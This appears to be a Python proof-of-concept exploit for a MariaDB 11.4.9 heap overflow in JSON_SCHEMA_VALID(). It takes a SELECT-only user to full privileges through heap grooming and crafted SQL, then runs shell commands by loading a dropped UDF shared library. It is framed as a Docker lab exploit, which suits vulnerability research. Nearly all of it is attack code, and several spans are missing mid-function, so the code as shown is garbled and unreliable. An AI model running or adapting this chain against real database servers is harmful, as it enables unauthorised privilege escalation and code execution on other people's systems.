#!/usr/bin/env python3 """ CVE-2026-32710 — Heap OOB Write → Privilege Escalation → UDF RCE Stage 1: Two-hop arbitrary write via JSON_SCHEMA_VALID() heap overflow. SELECT-only user → ALL PRIVILEGES WITH GRANT OPTION. Chain payload is pure SQL over TCP. Stage 2: UDF code execution via DUMPFILE + CREATE FUNCTION. Writes pre-compiled .so to plugin_dir, executes arbitrary commands. Target: MariaDB 11.4.9 (Docker, ASLR disabled on host) Lab-assisted: The script uses Docker/root introspection to read /proc/1/mem and discover heap layout. The actual exploit chain is pure SQL over TCP. A weaponized exploit would need an info-leak primitive to replace the memory introspection step. Usage: ./setup.sh # build and start the lab python3 exploit.py # auto-calibrate and exploit python3 exploit.py --calibrate # measure constants only python3 exploit.py --cmd 'id > /tmp/pwned' # custom command """ import argparse import hashlib import json import socket import struct import subprocess import sys import time CONTAINER = "mariadb-cve-2026-32710" VAR_A = "a" * 40 VAR_B = "b" * 40 VAR_C = "c" * 40 EXHAUST_COUNT = 100 MA_STRUCT_OFFSET = 1712 # Security_context::master_access offset in struct # =========================================================================== # # Minimal MySQL/MariaDB protocol client (no external dependencies) # # =========================================================================== # class MySQL: """COM_QUERY-only MySQL client over TCP.""" def __init__(self, host, port, user, password, db=None, timeout=30): self.sock = socket.create_connection((host, port), timeout=timeout) self.sock.settimeout(timeout) self._auth(user, password, db) def _recv(self, n): buf = bytearray() while len(buf) < n: c = self.sock.recv(n - len(buf)) if not c: raise ConnectionError("server closed connection") buf += c return bytes(buf) def _rpkt(self): h = self._recv(4) plen = int.from_bytes(h[:3], "little") return h[3], self._recv(plen) def _wpkt(self, seq, data): self.sock.sendall( len(data).to_bytes(3, "little") + bytes([seq & 0xFF]) + data ) def _auth(self, user, pw, db): _, g = self._rpkt() nul = g.index(0, 1) p = nul + 5 salt1 = g[p : p + 8] p += 9 + 2 + 1 + 2 + 2 + 1 + 10 salt2 = g[p : p + 12] salt = salt1 + salt2 if pw: h1 = hashlib.sha1(pw.encode()).digest() h2 = hashlib.sha1(h1).digest() h3 = hashlib.sha1(salt + h2).digest() token = bytes(a ^ b for a, b in zip(h1, h3)) else: token = b"" caps = 0x000FA68D | (0x08 if db else 0) r = struct.pack(" 4194304: continue if len(p) > 5 and p[5].strip(): continue ranges.append((s,e)) entries = {} master_access = [] MA_OFF = %d for s, e in ranges: d = rm(s, e-s) if not d: continue for off in range(0, len(d)-128, 8): nl = struct.unpack("= 0 and sc + MA_OFF + 8 <= len(d): u = struct.unpack("> 8) & 0xFF if not json_safe(lo) or not json_safe(hi): return None, f"non-JSON-safe bytes (LO=0x{lo:02x} HI=0x{hi:02x})" if (ec["value_ptr"] >> 16) != (a32 >> 16): return None, "entry_c->value and entry_a+32 in different 64KB pages" return { "lo": lo, "hi": hi, "ma_addr": ma["addr"], "ma_val": ma["val"], "ea_addr": ea["addr"], "ea_value": ea["value_ptr"], "ec_addr": ec["addr"], "ec_value": ec["value_ptr"], "sc_base": ma["base"], }, None def read_memory(container, addr, size): """Read raw bytes from mariadbd process memory.""" r = subprocess.run( ["docker", "exec", container, "python3", "-c", f"m=open('/proc/1/mem','rb');m.seek({addr});print(m.read({size}).hex());m.close()"], capture_output=True, text=True, timeout=10, ) if r.returncode == 0 and "Error" not in r.stdout: try: return bytes.fromhex(r.stdout.strip()) except ValueError: pass return None # =========================================================================== # # Stage 1: Privilege escalation (SQL chain over TCP) # # =========================================================================== # def groom(db): """Exhaust tcache and place sentinel variables for adjacent allocation.""" for i in range(EXHAUST_COUNT): db.query(f"SET @e{'x' * 38}{i:02d} = REPEAT('X', 127)") db.query(f"SET @{VAR_A} = REPEAT('X', 127)") db.query(f"SET @{VAR_B} = REPEAT('X', 127)") db.query(f"SET @{VAR_C} = REPEAT('X', 127)") db.query(f"SET @{VAR_A} = REPEAT('Z', 500)") def build_chain_sql(lo, hi, ma_addr): """Build the single-statement two-hop chain SQL.""" ma_bytes = struct.pack("" in command: outfile = command.split(">")[-1].strip().rstrip("'\" ") r = db.query(f"SELECT LOAD_FILE('{outfile}')") if r and r[0] != "NULL" and not r[0].startswith("ERR"): print(f" Output: {r[0].strip()}") db.close() return True # =========================================================================== # # Persistence verification # # =========================================================================== # def ensure_server(host, port, container, label=""): """Ensure MariaDB is reachable, restarting the container if needed.""" if label: print(f"\n[*] {label}") for attempt in range(3): try: db = MySQL(host, port, "lowpriv", "lowpriv", "test", timeout=5) return db except Exception: pass print(" Server unreachable — restarting container...") subprocess.run( ["docker", "restart", container], capture_output=True, timeout=30 ) time.sleep(5) return None def verify_persistence(host, port, container): """Verify ALL PRIVILEGES survived server restart.""" db = ensure_server(host, port, container, "Persistence check...") if not db: print(" Server unreachable after restart") return False r = db.query("SHOW GRANTS FOR CURRENT_USER()") for row in r: print(f" {row}") ok = any("ALL PRIVILEGES" in row for row in r) if ok: r = db.query("SELECT LOAD_FILE('/etc/hostname')") if r and r[0] != "NULL": print(f" LOAD_FILE: {r[0].strip()}") db.close() return ok # =========================================================================== # # Calibration mode # # =========================================================================== # def calibrate(host, port, container): """Connect, groom, scan, and print measured constants.""" print("[*] Calibrating...") db = MySQL(host, port, "lowpriv", "lowpriv", "test") groom(db) scan, err = scan_heap(container) db.close() if not scan: print(f" Failed: {err}") return False a32 = scan["ea_addr"] + 32 offset = scan["ea_value"] - scan["ma_addr"] print(f"\n entry_a: 0x{scan['ea_addr']:016x} value=0x{scan['ea_value']:016x}") print(f" entry_a+32: 0x{a32:016x} (LO=0x{scan['lo']:02x} HI=0x{scan['hi']:02x})") print(f" entry_c: 0x{scan['ec_addr']:016x} value=0x{scan['ec_value']:016x}") print(f" master_access: 0x{scan['ma_addr']:016x} = 0x{scan['ma_val']:x}") print(f" SC base: 0x{scan['sc_base']:016x}") print(f" OFFSET: 0x{offset:x} ({offset})") return True # =========================================================================== # # Main # # =========================================================================== # def main(): ap = argparse.ArgumentParser( description="CVE-2026-32710: MariaDB JSON_SCHEMA_VALID() heap OOB → RCE" ) ap.add_argument("--host", default="127.0.0.1") ap.add_argument("--port", type=int, default=3306) ap.add_argument("--container", default=CONTAINER) ap.add_argument("--calibrate", action="store_true", help="Measure heap layout constants and exit") ap.add_argument("--cmd", default="id > /tmp/pwned", help="Command to execute via sys_exec()") ap.add_argument("--attempts", type=int, default=5, help="Max stage 1 attempts") ap.add_argument("--stage1-only", action="store_true", help="Skip UDF RCE (stage 2)") args = ap.parse_args() print("=" * 70) print("CVE-2026-32710 — Heap OOB → Privilege Escalation → UDF RCE") print(f" Target: {args.host}:{args.port} (MariaDB 11.4.9)") print(f" Impact: lowpriv (SELECT only) → ALL PRIVILEGES → RCE") print(f" Method: Lab-assisted (uses /proc/1/mem for heap introspection)") print("=" * 70) if args.calibrate: calibrate(args.host, args.port, args.container) sys.exit(0) if not stage1(args.host, args.port, args.container, args.attempts): print("\n[!] Stage 1 FAILED") sys.exit(1) print("\n[+] Stage 1: PRIVILEGE ESCALATION SUCCESSFUL") if args.stage1_only: verify_persistence(args.host, args.port, args.container) sys.exit(0) if not stage2(args.host, args.port, args.container, args.cmd): print("\n[!] Stage 2 FAILED") verify_persistence(args.host, args.port, args.container) sys.exit(1) print(f"\n[+] Stage 2: COMMAND EXECUTED") print(f" Verify: docker exec {args.container} cat /tmp/pwned") sys.exit(0) if __name__ == "__main__": main()